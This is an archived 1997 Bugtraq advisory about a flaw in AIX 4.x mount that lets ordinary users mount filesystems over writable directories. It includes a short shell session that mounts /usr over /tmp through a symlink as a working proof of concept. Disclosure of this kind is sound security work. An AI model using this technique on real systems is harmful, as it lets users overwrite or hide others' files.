AIX mount vunlerability

Summary
Description:AIX mount has a serious problem that allows people to mount any filesystem on top of any writeable space.
Author:"S. Ryan Quick" <ryan@PHAEDO.COM>
Compromise:Mount filesystems on top of any writeable space (this could allow you to clobber files, among other things).
Vulnerable Systems:AIX 4.1.3, 4.1.4, 4.2.0, 4.2.1
Date:28 December 1997
Details


Date: Sun, 28 Dec 1997 22:26:17 -0500
From: "S. Ryan Quick" <ryan@PHAEDO.COM>
To: BUGTRAQ@NETSPACE.ORG
Subject: AIX 4.x Mount

-----BEGIN PGP SIGNED MESSAGE-----

My apologies if this is known already . . . however, I've seen nothing about
it and it does concern me.  I have verified a problem with mount on AIX 4.1.3,
4.1.4, 4.2.0, and 4.2.1 which allows a normal user to mount any filesystem
(including those already mounted by the system) on top of any writable
space.  Immediately, as the script below shows, this allows a user to
overwrite the contents of 777 directories with whatever files one wants.

(e.g. Removing access to temporary files in /tmp) . . .

sapphire /home/rquick > oslevel
4.1.4.0
sapphire /home/rquick > who am i
rquick    pts/2
sapphire /home/rquick > id
uid=20653(rquick) gid=101(comtec)
sapphire /home/rquick > ln -s /tmp mnt
sapphire /home/rquick > mount /usr mnt
sapphire /home/rquick > cd /tmp
sapphire /tmp > ls
OV           dict         include      lpd          sbin         ucb
adm          dt           lbin         lpp          share        usg
bin          ebt          lib          man          spool
ccs          eligibility  local        pub          sys
common       etc          lost+found   samples      tmp
sapphire /tmp > cd
sapphire /home/rquick > umount mnt
sapphire /home/rquick >



I have notified IBM of the problem . . . they have yet to respond.


S. Ryan Quick
UNIX Systems Engineer
Phaedo Consulting, Inc.
PGP:  www.phaedo.com/ryan/



-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a
Charset: noconv

iQCVAwUBNKcYXvUYDAQiV+tNAQHbKgP9HokdEF6xFHN2Q8E2/9YL5Lb4b8QAuI2k
RXe6APFVr0ql7rFjCiw3oqvFUYFwyrfhGgkHbf2pJ7ItbuPUkAURWDQY4SyBgH6s
Onw92WbgQkoycS8IIutMh/wVNH6X77jQzb24DBfokxsWpMsqCv0WyB6GuknZEPyq
QP21o8n0YjY=
=23mM
-----END PGP SIGNATURE-----

More Exploits!

The master index of all exploits is available here (Very large file)
Or you can pick your favorite operating system:
All OS's Linux Solaris/SunOS Micro$oft
*BSD Macintosh AIX IRIX
ULTRIX/Digital UNIX HP/UX SCO Remote exploits

This page is part of Fyodor's exploit world. For a free program to automate scanning your network for vulnerable hosts and services, check out my network mapping tool, nmap. Or try these Insecure.Org resouces:

[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault